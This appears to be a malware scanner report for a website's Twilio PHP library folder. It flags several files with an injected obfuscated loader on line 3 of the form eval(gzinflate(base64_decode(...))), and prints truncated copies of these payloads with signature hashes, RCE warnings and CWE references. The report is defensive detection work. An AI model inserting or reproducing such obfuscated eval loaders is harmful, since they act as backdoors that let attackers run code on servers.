<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyP9ygpKXCtSE4tKMnMz1NIrShJzUspVnAtKsovQghX1wIAVPV9GUEAAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyP9ygpKXCtSE4tKMnMz1NIrShJzUspVnAtKsovQghX1wIAVPV9GUEAAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/HttpStream.php

Size: 1.36 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1W32/bNhB+D5D/gVOdWko0JwWGPjhwgG0o0McBzZ6SQKClk0WMFjWSsp0V+d93JCWLkqwkBSoEjqg7frz77hfPz64vL8/PyCX5en//F/mmJdAt2YFUTJRE5EQXQO5Z+fxV64r8yRmUmtQKMqIFSUVZQqrN6/2ecSYskAK5YymohVldn5+dn6WcKkW+Nd8Tp5sYRHfel0MKlTYHwkFDmSnyRUohu8/fX94DQ74bLYJPJdmOaiAzWusiKYBmIMmKlDXntwONWrIJSQbreoOynHIFA6HSVLPU6OS05joR1k6F2lRK+hw6bfMEBdoXkNXdSOKk1jZlFYIgHkg124KotZV+vhlKc8G52CdcpNScbrW0rGGoxzalkJCA4VSd0oq890Ap7pnbiqIhO0OPjUKjUq85cpPXZWqDlySYJwqPTHXY0D2fx2T2z57KjQcQmfi1Zsx0wdSvd07d7LrtZCwnIVMKEM5hPMxtrOZPfQw...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1W32/bNhB+D5D/gVOdWko0JwWGPjhwgG0o0McBzZ6SQKClk0WMFjWSsp0V+d93JCWLkqwkBSoEjqg7frz77hfPz64vL8/PyCX5en//F/mmJdAt2YFUTJRE5EQXQO5Z+fxV64r8yRmUmtQKMqIFSUVZQqrN6/2ecSYskAK5YymohVldn5+dn6WcKkW+Nd8Tp5sYRHfel0MKlTYHwkFDmSnyRUohu8/fX94DQ74bLYJPJdmOaiAzWusiKYBmIMmKlDXntwONWrIJSQbreoOynHIFA6HSVLPU6OS05joR1k6F2lRK+hw6bfMEBdoXkNXdSOKk1jZlFYIgHkg124KotZV+vhlKc8G52CdcpNScbrW0rGGoxzalkJCA4VSd0oq890Ap7pnbiqIhO0OPjUKjUq85cpPXZWqDlySYJwqPTHXY0D2fx2T2z57KjQcQmfi1Zsx...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1W32/bNhB+D5D/gVOdWko0JwWGPjhwgG0o0McBzZ6SQKClk0WMFjWSsp0V+d93JCWLkqwkBSoEjqg7frz77hfPz64vL8/PyCX5en//F/mmJdAt2YFUTJRE5EQXQO5Z+fxV64r8yRmUmtQKMqIFSUVZQqrN6/2ecSYskAK5YymohVldn5+dn6WcKkW+Nd8Tp5sYRHfel0MKlTYHwkFDmSnyRUohu8/fX94DQ74bLYJPJdmOaiAzWusiKYBmIMmKlDXntwONWrIJSQbreoOynHIFA6HSVLPU6OS05joR1k6F2lRK+hw6bfMEBdoXkNXdSOKk1jZlFYIgHkg124KotZV+vhlKc8G52CdcpNScbrW0rGGoxzalkJCA4VSd0oq890Ap7pnbiqIhO0OPjUKjUq85cpPXZWqDlySYJwqPTHXY0D2fx2T2z57KjQcQmfi1Zsx...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/InstanceResource.php

Size: 1.45 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAM1VUW/bNhB+D5D/cAUM1A48+d1rgxrdsGZAs6Dx9mrT0sniIpEaScVRi/z3HilSYi25zxMMmxbvPn539/Hu+ur6anVzc30FN/AhZQaPUrXwiOqZp6i71zVLn9gRoX+92554yWW3yxpTSAUA99hUTMA/UhzhnXB/PhhnmKSyuu2sS/IXmrAKY+r1apUqZIY/I1lUUuhEquPK2+jV57vtCugruIonsI93rZGppC7qRKBZeY6rCYqr6yjGzUEbxVLDpQCZA/HlQhsmUgSFWjaKFrmSFZgCocOAzcNd4oGYd4e0ZFqfJ2R357G+BCh8MSiysWFv8M2Ss0F1BO1zA5/ZEwIjQv81qA0Y6dgQDbts6ozKNMk8APRA65opVkHFXzCDmfuj17ARwJRirU1Ah6aXQCVkUCtZozItCFbhBZRnVja4BtiAW8GJmwJOBU+LiJ3le5kVnVAThGjKcnhpCiVPxI7ReUW9dgle7ylR5ve...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM1VUW/bNhB+D5D/cAUM1A48+d1rgxrdsGZAs6Dx9mrT0sniIpEaScVRi/z3HilSYi25zxMMmxbvPn539/Hu+ur6anVzc30FN/AhZQaPUrXwiOqZp6i71zVLn9gRoX+92554yWW3yxpTSAUA99hUTMA/UhzhnXB/PhhnmKSyuu2sS/IXmrAKY+r1apUqZIY/I1lUUuhEquPK2+jV57vtCugruIonsI93rZGppC7qRKBZeY6rCYqr6yjGzUEbxVLDpQCZA/HlQhsmUgSFWjaKFrmSFZgCocOAzcNd4oGYd4e0ZFqfJ2R357G+BCh8MSiysWFv8M2Ss0F1BO1zA5/ZEwIjQv81qA0Y6dgQDbts6ozKNMk8APRA65opVkHFXzCDmfuj17ARwJRirU1Ah6aXQCVkUCtZozItCFbhBZRnVja4BtiAW8GJmwJOBU+LiJ3le5k...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM1VUW/bNhB+D5D/cAUM1A48+d1rgxrdsGZAs6Dx9mrT0sniIpEaScVRi/z3HilSYi25zxMMmxbvPn539/Hu+ur6anVzc30FN/AhZQaPUrXwiOqZp6i71zVLn9gRoX+92554yWW3yxpTSAUA99hUTMA/UhzhnXB/PhhnmKSyuu2sS/IXmrAKY+r1apUqZIY/I1lUUuhEquPK2+jV57vtCugruIonsI93rZGppC7qRKBZeY6rCYqr6yjGzUEbxVLDpQCZA/HlQhsmUgSFWjaKFrmSFZgCocOAzcNd4oGYd4e0ZFqfJ2R357G+BCh8MSiysWFv8M2Ss0F1BO1zA5/ZEwIjQv81qA0Y6dgQDbts6ozKNMk8APRA65opVkHFXzCDmfuj17ARwJRirU1Ah6aXQCVkUCtZozItCFbhBZRnVja4BtiAW8GJmwJOBU+LiJ3le5k...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/ListResource.php

Size: 2.73 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAMVYbY8bNw7+HiD/gQ0WsJ3aHueAooWb9XUvuWtd9JJFdnvIN0eeoW1lx9KcRrObbdD/fqQ07zN+adC7GywWHpukqIfkQ0pPnzx9Ejx//vQJPIcfRGZ32gDAG8z2QsG/tNqCcp9/sA8ylnoa6r2XjWWIKkWAnbXJPAhCg8LKeySBvVbpVJttkMukwT+XtwHQv0JV3QE/uWqCwkyTXTJVaINEhHdii8ENmntST1e3bmHWDJ7WnL1ap9aI0EqtQG9AQCxTCwZTnZkQYWP0HuwOwavD1fVyynpO95a+b4rLfRLjHpVNndKHpUUjrDZX263BrbDo9F4WDue+Ei6ZiANUQRiLNJ3KXEsUWryrxYcVCBV5u690pqxYx+fZCwvpwo5UtMJGECzlZggUkUMBTgtayK1+oZ2+KzaKnyyqqCtUCJBJempwdJAYQ20TnzkkrJFka4o2bDLlQ7JahZQF1mShHV6EsSRbY7jIjBzBZ6/...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAMVYbY8bNw7+HiD/gQ0WsJ3aHueAooWb9XUvuWtd9JJFdnvIN0eeoW1lx9KcRrObbdD/fqQ07zN+adC7GywWHpukqIfkQ0pPnzx9Ejx//vQJPIcfRGZ32gDAG8z2QsG/tNqCcp9/sA8ylnoa6r2XjWWIKkWAnbXJPAhCg8LKeySBvVbpVJttkMukwT+XtwHQv0JV3QE/uWqCwkyTXTJVaINEhHdii8ENmntST1e3bmHWDJ7WnL1ap9aI0EqtQG9AQCxTCwZTnZkQYWP0HuwOwavD1fVyynpO95a+b4rLfRLjHpVNndKHpUUjrDZX263BrbDo9F4WDue+Ei6ZiANUQRiLNJ3KXEsUWryrxYcVCBV5u690pqxYx+fZCwvpwo5UtMJGECzlZggUkUMBTgtayK1+oZ2+KzaKnyyqqCtUCJBJempwdJAYQ20TnzkkrJFka4o...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAMVYbY8bNw7+HiD/gQ0WsJ3aHueAooWb9XUvuWtd9JJFdnvIN0eeoW1lx9KcRrObbdD/fqQ07zN+adC7GywWHpukqIfkQ0pPnzx9Ejx//vQJPIcfRGZ32gDAG8z2QsG/tNqCcp9/sA8ylnoa6r2XjWWIKkWAnbXJPAhCg8LKeySBvVbpVJttkMukwT+XtwHQv0JV3QE/uWqCwkyTXTJVaINEhHdii8ENmntST1e3bmHWDJ7WnL1ap9aI0EqtQG9AQCxTCwZTnZkQYWP0HuwOwavD1fVyynpO95a+b4rLfRLjHpVNndKHpUUjrDZX263BrbDo9F4WDue+Ei6ZiANUQRiLNJ3KXEsUWryrxYcVCBV5u690pqxYx+fZCwvpwo5UtMJGECzlZggUkUMBTgtayK1+oZ2+KzaKnyyqqCtUCJBJempwdJAYQ20TnzkkrJFka4o...

Function str_rot13 eval_str_rot13 Line: 3 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

<?php RIny

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/NumberType.php

Size: 703.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI1TTW+bQBC9I/Ef5mAJ4xSnTuILUahaqYdIVWS1vqP1emxWXXbp7hInrfrfO3wZMD50D4jVvHlv3vDwPd/jklkLP9C8Co423Z6EFDp9KfMdmu17gYBvDtV+CvkmrPuOVpeGo+/98T2gU5Q7KTgcSsWd0AqOeMa8sBznM05PKX7jHp7gwKTFENrW6sxcJmyUCGUdUxxTRWgCBpfaxOnSZ8V1LtRxk2mFzcDBY89l0JVGwUDxEwRXemwAMQSiLaRFVUlVW2r5/vpe83K7WLQKC9iQq4xZBAYKT1A3QtO47EBn8Nc3lhcSobTsiPGkvFwC13uMdlLzn3FMZMUE02woZ0Zq+4WsoalWc7N6WH1cr9eru/uHs/0OzKVA5aKEca7L6uW6zSghWSajpGgtzUcy4eNklrhghuVgnSEymA3ZYthmONoGOA0d8yUDM4a9E0F1sTF8VqCLKjlMtiV9gLqIjgatmaq8MqlJ9yRcNnb...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1TTW+bQBC9I/Ef5mAJ4xSnTuILUahaqYdIVWS1vqP1emxWXXbp7hInrfrfO3wZMD50D4jVvHlv3vDwPd/jklkLP9C8Co423Z6EFDp9KfMdmu17gYBvDtV+CvkmrPuOVpeGo+/98T2gU5Q7KTgcSsWd0AqOeMa8sBznM05PKX7jHp7gwKTFENrW6sxcJmyUCGUdUxxTRWgCBpfaxOnSZ8V1LtRxk2mFzcDBY89l0JVGwUDxEwRXemwAMQSiLaRFVUlVW2r5/vpe83K7WLQKC9iQq4xZBAYKT1A3QtO47EBn8Nc3lhcSobTsiPGkvFwC13uMdlLzn3FMZMUE02woZ0Zq+4WsoalWc7N6WH1cr9eru/uHs/0OzKVA5aKEca7L6uW6zSghWSajpGgtzUcy4eNklrhghuVgnSEymA3ZYthmONoGOA0d8yUDM4a9E0F1sTF...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1TTW+bQBC9I/Ef5mAJ4xSnTuILUahaqYdIVWS1vqP1emxWXXbp7hInrfrfO3wZMD50D4jVvHlv3vDwPd/jklkLP9C8Co423Z6EFDp9KfMdmu17gYBvDtV+CvkmrPuOVpeGo+/98T2gU5Q7KTgcSsWd0AqOeMa8sBznM05PKX7jHp7gwKTFENrW6sxcJmyUCGUdUxxTRWgCBpfaxOnSZ8V1LtRxk2mFzcDBY89l0JVGwUDxEwRXemwAMQSiLaRFVUlVW2r5/vpe83K7WLQKC9iQq4xZBAYKT1A3QtO47EBn8Nc3lhcSobTsiPGkvFwC13uMdlLzn3FMZMUE02woZ0Zq+4WsoalWc7N6WH1cr9eru/uHs/0OzKVA5aKEca7L6uW6zSghWSajpGgtzUcy4eNklrhghuVgnSEymA3ZYthmONoGOA0d8yUDM4a9E0F1sTF...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Page.php

Size: 823.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI1UTW/iMBC9R8p/mAMHirbJnW4RqCcOXa20aK+RSafBS2JbYweKUP/7ju0EunyuD0mYefP13pg0SZN8NEoTGMEMCA2hReWEk1qBfgcBRlTov9ihWyrRZh4cAqalcFhp2sEvpI1kXzQbUa591MFcLLayljp6RetWmgDgB7aNUPBbqwq+q/Bj6gIwK3Uzieia45XlXCvnzDjPS0JuboOMaLSymaYq7zA2f50vcuBHH6rW4E8XalBQZlYmU+jyrsf8Qos5pElZC2tP+y9+cgQj+MjG1NgwUxbmDkk4TbOqIqyYkTTZp0mERWr9GcFihSAdNlBL67LefHBPN4JAEIkdDDzM9p48fhjSDkuHb5376VKNF6bEUVtyW1G5C3WMINGAXv7hbDAI8vrWos7BeorllJI1GijRROwad34l3NeJTtttlywLvLeqDLtUFGXf2zAU/Rbz+Rd+uMKbipYkPINq6/ohZtl3WfkM3Erax0l...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1UTW/iMBC9R8p/mAMHirbJnW4RqCcOXa20aK+RSafBS2JbYweKUP/7ju0EunyuD0mYefP13pg0SZN8NEoTGMEMCA2hReWEk1qBfgcBRlTov9ihWyrRZh4cAqalcFhp2sEvpI1kXzQbUa591MFcLLayljp6RetWmgDgB7aNUPBbqwq+q/Bj6gIwK3Uzieia45XlXCvnzDjPS0JuboOMaLSymaYq7zA2f50vcuBHH6rW4E8XalBQZlYmU+jyrsf8Qos5pElZC2tP+y9+cgQj+MjG1NgwUxbmDkk4TbOqIqyYkTTZp0mERWr9GcFihSAdNlBL67LefHBPN4JAEIkdDDzM9p48fhjSDkuHb5376VKNF6bEUVtyW1G5C3WMINGAXv7hbDAI8vrWos7BeorllJI1GijRROwad34l3NeJTtttlywLvLeqDLtUFGXf2zAU/Rb...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1UTW/iMBC9R8p/mAMHirbJnW4RqCcOXa20aK+RSafBS2JbYweKUP/7ju0EunyuD0mYefP13pg0SZN8NEoTGMEMCA2hReWEk1qBfgcBRlTov9ihWyrRZh4cAqalcFhp2sEvpI1kXzQbUa591MFcLLayljp6RetWmgDgB7aNUPBbqwq+q/Bj6gIwK3Uzieia45XlXCvnzDjPS0JuboOMaLSymaYq7zA2f50vcuBHH6rW4E8XalBQZlYmU+jyrsf8Qos5pElZC2tP+y9+cgQj+MjG1NgwUxbmDkk4TbOqIqyYkTTZp0mERWr9GcFihSAdNlBL67LefHBPN4JAEIkdDDzM9p48fhjSDkuHb5376VKNF6bEUVtyW1G5C3WMINGAXv7hbDAI8vrWos7BeorllJI1GijRROwad34l3NeJTtttlywLvLeqDLtUFGXf2zAU/Rb...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/PartialApplicationHelper.php

Size: 727.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAIVTwWrcMBC9G/wP07AHe0nte7YNySGlhaYUEnopRcjasa3GloQ03s1S8u+VJXfX22STwRg8evPmvSecJmlSLpdpAkv4jJ1BC6LjzgFp2FpugCvQ1W8UBFtJLXDo9VrWEtcgFaGtuUAQFjn5TrULPBwMtyR5B9yYTgpOUnuWGiQ5wEfpSKoGeqRWr10xjoSxKw/ERtsd3KHdSIEutg0XD7xB2LfZ/VZ2UsdTPngaCwDfcOi92B/ac39Q4eOKArAQur+MaK8GlfNcLZG5KMugXG7QI3qtXKFtU04YV95+uS/Bv/6NqgcYaxo1yG1hWlMopHLSWL4gsYQ0iZH+d8i+x5SuDyHFG0iTP37Ql7Fy4zOBheBdV/kVbpUm09FQ+SGoByVCuowJr5/sICjLI2QiGWtBrXTvL/c08BG4tXyX5asIejrF65CyRbyq84OO8zgOC24b93ydrCF7Jx0b4bzqMNsP5vkcN5ZFGqyCT9d...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAIVTwWrcMBC9G/wP07AHe0nte7YNySGlhaYUEnopRcjasa3GloQ03s1S8u+VJXfX22STwRg8evPmvSecJmlSLpdpAkv4jJ1BC6LjzgFp2FpugCvQ1W8UBFtJLXDo9VrWEtcgFaGtuUAQFjn5TrULPBwMtyR5B9yYTgpOUnuWGiQ5wEfpSKoGeqRWr10xjoSxKw/ERtsd3KHdSIEutg0XD7xB2LfZ/VZ2UsdTPngaCwDfcOi92B/ac39Q4eOKArAQur+MaK8GlfNcLZG5KMugXG7QI3qtXKFtU04YV95+uS/Bv/6NqgcYaxo1yG1hWlMopHLSWL4gsYQ0iZH+d8i+x5SuDyHFG0iTP37Ql7Fy4zOBheBdV/kVbpUm09FQ+SGoByVCuowJr5/sICjLI2QiGWtBrXTvL/c08BG4tXyX5asIejrF65CyRbyq84OO8zgOC24...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAIVTwWrcMBC9G/wP07AHe0nte7YNySGlhaYUEnopRcjasa3GloQ03s1S8u+VJXfX22STwRg8evPmvSecJmlSLpdpAkv4jJ1BC6LjzgFp2FpugCvQ1W8UBFtJLXDo9VrWEtcgFaGtuUAQFjn5TrULPBwMtyR5B9yYTgpOUnuWGiQ5wEfpSKoGeqRWr10xjoSxKw/ERtsd3KHdSIEutg0XD7xB2LfZ/VZ2UsdTPngaCwDfcOi92B/ac39Q4eOKArAQur+MaK8GlfNcLZG5KMugXG7QI3qtXKFtU04YV95+uS/Bv/6NqgcYaxo1yG1hWlMopHLSWL4gsYQ0iZH+d8i+x5SuDyHFG0iTP37Ql7Fy4zOBheBdV/kVbpUm09FQ+SGoByVCuowJr5/sICjLI2QiGWtBrXTvL/c08BG4tXyX5asIejrF65CyRbyq84OO8zgOC24...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/RequestValidator.php

Size: 707.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAIVTTYvbMBC9B/IfhuCDDVkbl6aHBAeWUNhDP0I39GoUeRKJOJIqjbMNS/975Y/a8W7Z1cHC9pv33oyeppPphJfMOXhEe5EcXb57kqXU+Q/8VaGjn6yUBSNtp5PnqQeDX8ZqQk5YQHBfkdjpE6rVv5+HSnGSWkGec60c2YpTGFCNiVrEc7vVKyAh3d26Z4EMWuiqxfxpt0622peSDwJcn01F+CiPilFlMQwqW84h8HaZJ2LWsmsYvRZNEnDaEpDAFgT7K5zw6gbIqQaEDVPUd9bVMmNQFXX1GUg3LI2ib1WqI0gF2hZoRzVPkgQoDQWW8iwJ7Y3WQVtkXLRqwBwE3gtkawgurKwwGpDNxHyPEGcwq1EtYrYaQ0bKOz/gm5GxklclI3SN74ev9xsQzAnQh6GRxmz95hVGXMbnxB+6VKOv33wYlg1LLs6Mg/XBkdYrbB+2sIB1Bos4jT/4qcD28+ZLg1ymcXqXxosR0Xc...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAIVTTYvbMBC9B/IfhuCDDVkbl6aHBAeWUNhDP0I39GoUeRKJOJIqjbMNS/975Y/a8W7Z1cHC9pv33oyeppPphJfMOXhEe5EcXb57kqXU+Q/8VaGjn6yUBSNtp5PnqQeDX8ZqQk5YQHBfkdjpE6rVv5+HSnGSWkGec60c2YpTGFCNiVrEc7vVKyAh3d26Z4EMWuiqxfxpt0622peSDwJcn01F+CiPilFlMQwqW84h8HaZJ2LWsmsYvRZNEnDaEpDAFgT7K5zw6gbIqQaEDVPUd9bVMmNQFXX1GUg3LI2ib1WqI0gF2hZoRzVPkgQoDQWW8iwJ7Y3WQVtkXLRqwBwE3gtkawgurKwwGpDNxHyPEGcwq1EtYrYaQ0bKOz/gm5GxklclI3SN74ev9xsQzAnQh6GRxmz95hVGXMbnxB+6VKOv33wYlg1LLs6Mg/XBkdYrbB+...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAIVTTYvbMBC9B/IfhuCDDVkbl6aHBAeWUNhDP0I39GoUeRKJOJIqjbMNS/975Y/a8W7Z1cHC9pv33oyeppPphJfMOXhEe5EcXb57kqXU+Q/8VaGjn6yUBSNtp5PnqQeDX8ZqQk5YQHBfkdjpE6rVv5+HSnGSWkGec60c2YpTGFCNiVrEc7vVKyAh3d26Z4EMWuiqxfxpt0622peSDwJcn01F+CiPilFlMQwqW84h8HaZJ2LWsmsYvRZNEnDaEpDAFgT7K5zw6gbIqQaEDVPUd9bVMmNQFXX1GUg3LI2ib1WqI0gF2hZoRzVPkgQoDQWW8iwJ7Y3WQVtkXLRqwBwE3gtkawgurKwwGpDNxHyPEGcwq1EtYrYaQ0bKOz/gm5GxklclI3SN74ev9xsQzAnQh6GRxmz95hVGXMbnxB+6VKOv33wYlg1LLs6Mg/XBkdYrbB+...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Resource.php

Size: 1.82 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAKVXbW/jRBD+Xqn/YYiii1OlscrHlJRWJwRFtFSXCiSqYq2die2rvWt2121zcP+d2V3b8UtSDvAHx1nP2z7zzOz4+Oj4yD85OT6CE7gKlZYs0qngIDbA4P4lzVIBEpUoZYRzI2UlLyOmMRZyCyuUz2mEyi0XLHpiMUKzHDgT7i0rdSIkANximTMOvwgewzfc/rnUVnAeifzCSWekzxXZSrQuFr4fSWQ6fUaSyAVXcyFjv5JR/s31vQ90q1X5E5irUi2QyXmRFHOO2q9i9PeE6B8fsQoDiDKmVH8fwYcKCviT5OkqpNAYaVzDWJVhDZQ6Pz6q3pchxQibkjtYgyCi2LUsI+2NoyxFrmcwLmVK94JJlitYApOSbb3p1JmoPJlrrJNUnV60Pe3Ezwdyzj5JVJ6aqMy1EYRnlIBX+2UKxpzlCMuLKpZp23fLbiVWSbX8fm47qIRpb0aUfoYBpjztwVDvorG0A7jBcI/WACn...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVXbW/jRBD+Xqn/YYiii1OlscrHlJRWJwRFtFSXCiSqYq2die2rvWt2121zcP+d2V3b8UtSDvAHx1nP2z7zzOz4+Oj4yD85OT6CE7gKlZYs0qngIDbA4P4lzVIBEpUoZYRzI2UlLyOmMRZyCyuUz2mEyi0XLHpiMUKzHDgT7i0rdSIkANximTMOvwgewzfc/rnUVnAeifzCSWekzxXZSrQuFr4fSWQ6fUaSyAVXcyFjv5JR/s31vQ90q1X5E5irUi2QyXmRFHOO2q9i9PeE6B8fsQoDiDKmVH8fwYcKCviT5OkqpNAYaVzDWJVhDZQ6Pz6q3pchxQibkjtYgyCi2LUsI+2NoyxFrmcwLmVK94JJlitYApOSbb3p1JmoPJlrrJNUnV60Pe3Ezwdyzj5JVJ6aqMy1EYRnlIBX+2UKxpzlCMuLKpZp23fLbiVWSbX8fm4...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVXbW/jRBD+Xqn/YYiii1OlscrHlJRWJwRFtFSXCiSqYq2die2rvWt2121zcP+d2V3b8UtSDvAHx1nP2z7zzOz4+Oj4yD85OT6CE7gKlZYs0qngIDbA4P4lzVIBEpUoZYRzI2UlLyOmMRZyCyuUz2mEyi0XLHpiMUKzHDgT7i0rdSIkANximTMOvwgewzfc/rnUVnAeifzCSWekzxXZSrQuFr4fSWQ6fUaSyAVXcyFjv5JR/s31vQ90q1X5E5irUi2QyXmRFHOO2q9i9PeE6B8fsQoDiDKmVH8fwYcKCviT5OkqpNAYaVzDWJVhDZQ6Pz6q3pchxQibkjtYgyCi2LUsI+2NoyxFrmcwLmVK94JJlitYApOSbb3p1JmoPJlrrJNUnV60Pe3Ezwdyzj5JVJ6aqMy1EYRnlIBX+2UKxpzlCMuLKpZp23fLbiVWSbX8fm4...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/RestException.php

Size: 675.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI1Ty27bMBC8G9A/7MFAEsMPHdqLghTwoWgN5GAk7tmg6bVFhCIFcmUnKPrvXYqS/Ehih+BBIHdnZmeopJf0JoNB0oMBTA3gq8SSlDVAQr8oswWyQDnCYq+0sjCdz8awyJUH3pQ7uzewz9HgDt1RXYSbz8AhVc54EPAtTcE6+J6mI83V+kA1DtV1R1YKJwpQhqDvSVDlsxr092Ixh3gAGxuJuvbjTk8uaO4X6L3YYsa8eVUIM3Io1mKluc05BmjuL4PVMqRd1zBxrpEvUaqNkg1OuP2aImU2NuBoZV6Cp4V1COHQFaLtmSQ9qYX38IxupyT6ZWRdPqGnn10y+Epo1h4OJ38TThF4xSTDGnBKV4wbt6WT+FE6SygJ16359x/BTuHP02OYYIv0bgoQK1tRpAkGHd6KsQRC78Wb75DETigdQvlcR4DuVJTVSrPzm8rImmu5lNawv5Wk20bxsIt+GKODB0iHEYc/b27uglf...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

